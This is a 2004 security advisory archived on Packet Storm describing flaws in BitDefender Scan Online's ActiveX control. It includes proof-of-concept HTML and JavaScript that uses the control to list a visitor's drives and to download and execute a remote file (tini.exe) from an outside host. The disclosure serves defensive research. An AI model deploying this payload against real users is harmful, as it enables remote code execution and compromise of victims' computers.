exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bitdefender.txt

bitdefender.txt
Posted Apr 19, 2004
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

BitDefender's online scanning service has Active-X related flaws that allow an attacker to run arbitrary code server side.

tags | advisory, arbitrary, activex
SHA-256 | b99278bb29477cd2c8b3b823340d554551425884717cdd650dc007d6d6ad6370

bitdefender.txt

Change Mirror Download
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application: BitDefender Scan Online(ActiveX)
Vendors: http://www.bitdefender.com/scan/Msie/index.php
Platforms: Windows
Bug: Remote File Download & Execute & Private Information
Disclosure
Risk: High - Running Arbitary Code
Exploitation: Remote with browser
Date: 19 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of BitDefender Scan Online Description:
"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files.

This is a quote of the page title:
"BitDefender AntiVirus - Data Security, AntiVirus Software, Free
Protection".
The meaning of this sentence is very far from reality.
I believe this to be a ridiculous that an AntiVirus will deliver and execute
a virus on my system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

"BitDefender Scan Online" downloads its components and registered
the following COM/ActiveX Object:

"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID:
80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection, all properties and
functions cannot be set/accessed by the :

object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

It can only be set/accessed using(html object tag created object):

"<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>"
----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" Disclosures the users information, allowing a
remote user to see
all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
------------------- CUT HERE -------------------

----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" contains a function that will

***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***

For Example:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;

function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}

setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close